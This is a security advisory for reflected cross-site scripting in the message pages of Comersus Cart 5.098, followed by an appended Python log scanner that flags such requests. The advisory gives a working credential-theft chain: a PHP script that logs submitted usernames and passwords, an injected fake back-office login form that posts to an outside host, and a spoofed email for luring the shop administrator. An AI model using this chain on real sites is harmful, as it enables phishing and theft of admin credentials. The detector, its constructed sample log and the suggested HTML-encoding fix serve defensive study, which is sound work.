Comersus Shopping Cart 5.098 XSS Vulnerability
=======================================================

Vulnerable Systems:
 * Comersus Cart Version 5.098

Comersus is an open source shopping cart. I found a few XSS vulnerabilities:

Pages Affected:

    /comersus/store/comersus_message.asp
    /comersus/backofficeLite/comersus_backoffice_message.asp

Examples:

    http://www.target.net/comersus/store/comersus_message.asp?message=<h4>VULNERABLE</h4>
    http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<h4>VULNERABLE</h4>

Try this:

Step 1: Create a file called comersus.php

    <?
    $buka = fopen("comersus.txt","a+");
    fwrite($buka,"User:".$uid."|"."Password:".$passwd."|");
    fclose($buka);
    header("Location:http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=Your+authentication+data+is+incorrect...");
    exit();
    ?>

Next step: Open this URL:

    http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form>

Enter user and password, then submit.

After that, enter this URL:

    http://mysite.org/comersus.txt

This is the result (comersus.txt):

    User:az001|Password:passwordnya|

Send a fake email from the Comersus site (support@xxxxxxxxxxxx) to the www.target.net admin (e.g. admin@xxxxxxxxxx):

    Hello admin@xxxxxxxxxx
    blablablablabla ...
    Please Login with username and password <a href="http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form>">here</a>

and wait until the admin executes the URL.
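
A log check for the two affected pages, as an added example that is not part of the original advisory: it flags requests whose message parameter decodes to HTML markup, and marks separately those that carry an off-site form or link target like the one in the steps above. The log lines, client addresses and the host collector.example are constructed sample data, and the common-log-format layout is an assumption about the web server's access log.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# The two pages the advisory lists as reflecting the `message` parameter.
AFFECTED = ("/comersus/store/comersus_message.asp",
            "/comersus/backofficelite/comersus_backoffice_message.asp")
MARKUP = re.compile(r"<[a-z!/?]", re.I)  # tag opener: <form, <h4, </a, <!--
# A form/link/resource attribute that points at an absolute URL.
REMOTE = re.compile(r"\b(?:action|href|src)\s*=\s*[\"']?\s*(?:https?:)?//", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), bounded in depth."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return None, 'markup' or 'markup+remote-target' for one request target."""
    parts = urlsplit(target)
    if parts.path.lower() not in AFFECTED:   # path match is case-insensitive
        return None
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "message":
            continue
        value = decode_fully(raw)            # parse_qsl already decoded once
        if MARKUP.search(value):
            return "markup+remote-target" if REMOTE.search(value) else "markup"
    return None

def scan(lines):
    """Return (line_number, verdict) for every log line worth reviewing."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample access log (not taken from a real system).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2000:10:00:00 +0000] "GET /comersus/store/comersus_message.asp?message=Your+authentication+data+is+incorrect... HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Jan/2000:10:01:00 +0000] "GET /comersus/store/comersus_message.asp?message=%3Ch4%3EVULNERABLE%3C/h4%3E HTTP/1.1" 200 910',
    '203.0.113.4 - - [01/Jan/2000:10:02:00 +0000] "GET /comersus/backofficeLite/comersus_backoffice_message.asp?message=%3Cform%20action=http://collector.example/c.php%20method=post%3E%3Cinput%20type=password%20name=passwd%3E%3C/form%3E HTTP/1.1" 200 1200',
    '203.0.113.4 - - [01/Jan/2000:10:03:00 +0000] "GET /comersus/store/comersus_message.asp?message=%253Ch4%253EVULNERABLE%253C/h4%253E HTTP/1.1" 200 910',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Detection only shows who has been sent such links; the fix is to HTML-encode the message value before the page writes it out (Server.HTMLEncode in classic ASP).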